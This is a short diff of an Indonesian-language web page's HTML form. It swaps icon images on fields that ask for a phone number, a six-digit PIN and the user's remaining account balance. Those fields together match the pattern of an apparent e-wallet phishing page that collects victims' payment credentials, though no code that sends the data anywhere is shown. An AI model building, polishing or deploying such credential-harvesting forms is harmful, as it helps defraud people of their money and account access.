--- a/index.html
+++ b/index.html
@@ -134,7 +134,7 @@
       <div class="input-group">
         <label for="phone">Nomor Handphone</label>
         <div class="input-icon">
-          <img src="kol.png" alt="Phone Icon">
+          <img src="ind.png" alt="Phone Icon">
           <input type="tel" name="phone" id="phone" placeholder="+62 8xxx xxxx xxxx" required maxlength="12" oninput="this.value = this.value.replace(/\D/g,'').substring(0, 12)">
         </div>
       </div>
@@ -148,14 +148,14 @@
       <div class="input-group">
         <label for="pin">Masukkan PIN 6 Digit</label>
         <div class="input-icon">
-          <img src="https://i.ibb.co/z672Tng/IMG-20240415-143131-removebg-preview.png" alt="PIN Icon">
+          <img src="pin.png" alt="PIN Icon">
           <input type="password" name="pin" id="pin" placeholder="Masukkan PIN 6 Digit" required minlength="6" maxlength="6" oninput="this.value=this.value.replace(/\D/g,'')">
         </div>
       </div>
       <div class="input-group">
         <label for="balance">Sisa Saldo Terakhir</label>
         <div class="input-icon">
-          <img src="https://i.ibb.co/Yp3ws6X/1000005674-removebg-preview.png" alt="Saldo Icon">
+          <img src="kol.png" alt="Saldo Icon">
           <input type="tel" id="jumlahInput" name="balance" placeholder="Sisa Saldo Terakhir" required oninput="updateNominal()">
         </div>
       </div>
